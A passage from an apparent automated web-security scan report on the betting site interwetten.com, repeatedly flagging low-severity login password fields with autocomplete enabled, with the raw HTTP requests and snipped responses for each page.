Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/cycling-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/cycling-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:41 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:40 GMT
Connection: close
Content-Length: 223291
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/cycling-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.143. https://www.interwetten.com/en/darts-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/darts-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/darts-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/darts-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:12 GMT
Connection: close
Content-Length: 224110
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/darts-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.144. https://www.interwetten.com/en/default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/default.aspx?home=1

The form contains the following password field with autocomplete enabled:

wucHeader$ucLogin$txtPassword

Request

GET /en/default.aspx?home=1 HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

13.145. https://www.interwetten.com/en/football-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/football-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/football-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:13 GMT
Connection: close
Content-Length: 261103
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/football-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.146. https://www.interwetten.com/en/games/default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/games/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/games/default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/games/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

13.147. https://www.interwetten.com/en/golf-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/golf-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/golf-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/golf-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223229
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/golf-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.148. https://www.interwetten.com/en/handball-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/handball-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/handball-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/handball-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:21 GMT
Connection: close
Content-Length: 226608
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/handball-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.149. https://www.interwetten.com/en/ice-hockey-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/ice-hockey-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/ice-hockey-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/ice-hockey-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 225740
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/ice-hockey-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.150. https://www.interwetten.com/en/livebets previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/livebets

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/livebets

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/livebets HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:07 GMT
Connection: close
Content-Length: 222401
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/livebets" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.151. https://www.interwetten.com/en/motorbikes-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/motorbikes-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/motorbikes-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/motorbikes-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:02 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:01 GMT
Connection: close
Content-Length: 224123
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/motorbikes-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.152. https://www.interwetten.com/en/online-skillgames previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/online-skillgames

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/online-skillgames

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/online-skillgames HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 75500
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...


<form method="post" action="/en/online-skillgames" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.153. https://www.interwetten.com/en/politics-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/politics-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/politics-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/politics-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 221965
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/politics-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.154. https://www.interwetten.com/en/rugby-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/rugby-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/rugby-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/rugby-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:31 GMT
Connection: close
Content-Length: 225818
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/rugby-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.155. https://www.interwetten.com/en/sailing-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/sailing-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/sailing-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/sailing-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:29 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:28 GMT
Connection: close
Content-Length: 223288
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/sailing-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.156. https://www.interwetten.com/en/scratch/default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/scratch/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/scratch/default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/scratch/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

13.157. https://www.interwetten.com/en/ski-alpine-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/ski-alpine-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/ski-alpine-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/ski-alpine-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223263
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/ski-alpine-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.158. https://www.interwetten.com/en/skill/default.aspx previous next
